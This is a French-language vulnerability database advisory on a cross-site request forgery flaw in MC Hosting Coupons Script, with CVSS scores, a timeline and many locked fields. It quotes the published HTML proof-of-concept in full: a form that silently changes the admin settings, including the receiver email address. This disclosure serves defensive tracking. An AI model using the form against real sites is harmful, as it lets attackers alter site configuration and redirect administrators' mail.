| CVSS Score méta-temporaire | Prix actuel de l'exploit (≈) | Score d'intérêt CTI |
|---|---|---|
| 3.9 | $0-$5k | 0.00 |
Résumé
On a identifié une vulnérabilité de type problématique dans MC Hosting Coupons Script. L'élément affecté est une fonction inconnue. L’exploitation entraîne cross site request forgery. Une attaque à distance est possible. Par ailleurs, un exploit est disponible.
Détails
Une vulnérabilité qui a été classée problématique a été trouvée dans MC Hosting Coupons Script. Affecté est une fonction inconnue. La manipulation avec une valeur d'entrée inconnue mène à une vulnérabilité de classe cross site request forgery.
La vulnerabilité a été publié en 15/01/2017 par Ihsan Sencan avec le numéro d'identification EDB-ID 41067 avec exploitation (Exploit-DB) (non défini). La notice d'information est disponible en téléchargement sur exploit-db.com Il est possible de lancer l'attaque à distance. L'exploitation ne nécéssite aucune forme d'authentification. Les details techniques sont inconnus mais une méthode d'exploitation public est connue.
Un exploit a été developpé par Ihsan Sencan en HTML et a été publié immédiatement après la notice d'information. L'exploit est disponible au téléchargment sur exploit-db.com. Il est déclaré comme preuve de concept. Le code utilisé par l'exploit est:
<html> <body> <form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form"> <label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br> <input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br> <label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br> <input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords" placeholder="Write website keywords..." /><br> <label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br> <input value="[email protected]" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br> <label for="website_desc" class="control-label col-lg-4">Website Description</label><br> <textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br> <input type="submit" name="sub" value="Submit" class="btn btn-primary" /> </form> </body> </html>
Il n'y a aucune information à propos de possibles contremesures connues. Il est suggéré de remplacer l'object infecté par un produit alternatif.
La vulnérabilité est aussi documentée dans la base de données Exploit-DB (41067). VulDB is the best source for vulnerability data and more expert information about this specific topic.
Produit
Nom
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vecteur: 🔍VulDB Fiabilité: 🔍
CVSSv3
VulDB Score méta-base: 4.3VulDB Score méta-temporaire: 3.9
VulDB Note de base: 4.3
VulDB Note temporaire: 3.9
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vecteur | Complexité | Authentification | Confidentialité | Intégrité | Disponibilité |
|---|---|---|---|---|---|
| Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller |
| Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller |
| Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller |
VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍
Exploitation
Classe: Cross site request forgeryCWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍
Physique: Non
Local: Non
Remote: Oui
Disponibilité: 🔍
Accès: Public
Statut: Preuve de concept
Auteur: Ihsan Sencan
Langage de programmation: 🔍
Télécharger: 🔍
Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍
| 0-Day | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller |
|---|---|---|---|---|
| Aujourd'hui | Déverrouiller | Déverrouiller | Déverrouiller | Déverrouiller |
Exploit-DB: 🔍
Renseignements sur les menaces
Intérêt: 🔍Acteurs actifs: 🔍
Groupes APT actifs: 🔍
Contre-mesures
Recommandé: aucune mesure d'atténuation connueStatut: 🔍
Heure 0 jour: 🔍
Délai d'exploitation: 🔍
Chronologie
15/01/2017 🔍15/01/2017 🔍
15/01/2017 🔍
17/01/2017 🔍
23/07/2020 🔍
Sources
Bulletin: EDB-ID 41067Chercheur: Ihsan Sencan
Statut: Non défini
GCVE (VulDB): GCVE-100-95392
scip Labs: https://www.scip.ch/en/?labs.20161013
Entrée
Créé: 17/01/2017 13:27Mise à jour: 23/07/2020 14:10
Changements: 17/01/2017 13:27 (43), 23/07/2020 14:10 (2)
Complet: 🔍
Cache ID: 216::103
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Aucun commentaire pour l'instant. Langues: fr + it + en.
Veuillez vous connecter pour commenter.